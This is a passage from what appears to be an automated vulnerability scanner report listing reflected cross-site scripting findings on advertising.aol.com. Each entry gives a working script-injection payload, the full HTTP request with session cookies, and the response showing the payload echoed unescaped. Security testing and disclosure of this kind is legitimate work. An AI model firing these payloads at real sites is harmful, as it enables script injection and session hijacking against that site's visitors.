   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/96a23"-alert(1)-"38b4441aa25/5/3/1649521156/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

4.89. http://advertising.aol.com/token/5/3/1649521156/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/5/3/1649521156/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload feaf1"><script>alert(1)</script>39e73b78bbb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feaf1"><script>alert(1)</script>39e73b78bbb/5/3/1649521156/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:22 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/feaf1"><script>alert(1)</script>39e73b78bbb/5/3/1649521156/" />
...[SNIP]...

4.90. http://advertising.aol.com/token/6/1/1581270199/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/6/1/1581270199/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9154d"-alert(1)-"54a37e32f48 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /9154d"-alert(1)-"54a37e32f48/6/1/1581270199/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:46 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:46 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/9154d"-alert(1)-"54a37e32f48/6/1/1581270199/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

4.91. http://advertising.aol.com/token/6/1/1581270199/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/6/1/1581270199/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f20a6"><script>alert(1)</script>80e754d2ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /f20a6"><script>alert(1)</script>80e754d2ae/6/1/1581270199/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:42 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/f20a6"><script>alert(1)</script>80e754d2ae/6/1/1581270199/" />
...[SNIP]...

4.92. http://advertising.aol.com/token/6/3/882857095/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/6/3/882857095/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee14a"><script>alert(1)</script>2c72c6f0042 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ee14a"><script>alert(1)</script>2c72c6f0042/6/3/882857095/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:22 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/ee14a"><script>alert(1)</script>2c72c6f0042/6/3/882857095/" />
...[SNIP]...

4.93. http://advertising.aol.com/token/6/3/882857095/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/6/3/882857095/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8de4c"-alert(1)-"94a4b50c585 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /8de4c"-alert(1)-"94a4b50c585/6/3/882857095/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:26 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:26 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/8de4c"-alert(1)-"94a4b50c585/6/3/882857095/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,adverti
...[SNIP]...

4.94. http://advertising.aol.com/token/7/1/52531776/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/7/1/52531776/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8c8a"><script>alert(1)</script>3d537fa6b19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c8c8a"><script>alert(1)</script>3d537fa6b19/7/1/52531776/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:50 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13466

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/c8c8a"><script>alert(1)</script>3d537fa6b19/7/1/52531776/" />
...[SNIP]...

4.95. http://advertising.aol.com/token/7/1/52531776/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/7/1/52531776/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23776"-alert(1)-"cda52c37549 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /23776"-alert(1)-"cda52c37549/7/1/52531776/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:53 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:53 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13396

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/23776"-alert(1)-"cda52c37549/7/1/52531776/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertis
...[SNIP]...

4.96. http://advertising.aol.com/token/7/3/1777313403/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/7/3/1777313403/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ae45"><script>alert(1)</script>6be78db95a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /5ae45"><script>alert(1)</script>6be78db95a0/7/3/1777313403/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:07 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:07 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/5ae45"><script>alert(1)</script>6be78db95a0/7/3/1777313403/" />
...[SNIP]...

4.97. http://advertising.aol.com/token/7/3/1777313403/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/7/3/1777313403/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2e0c"-alert(1)-"71367095148 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /e2e0c"-alert(1)-"71367095148/7/3/1777313403/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:12 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:12 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/e2e0c"-alert(1)-"71367095148/7/3/1777313403/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

4.98. http://advertising.aol.com/token/8/1/585997419/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/8/1/585997419/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9666"><script>alert(1)</script>81ecfa560d4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c9666"><script>alert(1)</script>81ecfa560d4/8/1/585997419/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:44 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:44 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/c9666"><script>alert(1)</script>81ecfa560d4/8/1/585997419/" />
...[SNIP]...

4.99. http://advertising.aol.com/token/8/1/585997419/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/8/1/585997419/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ab87"-alert(1)-"af55da2faa0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /4ab87"-alert(1)-"af55da2faa0/8/1/585997419/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:47 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:48 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/4ab87"-alert(1)-"af55da2faa0/8/1/585997419/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,adverti
...[SNIP]...

4.100. http://advertising.aol.com/token/8/3/144927758/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/8/3/144927758/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5bd70"-alert(1)-"dfbccaadf2d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /5bd70"-alert(1)-"dfbccaadf2d/8/3/144927758/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:17 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:17 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
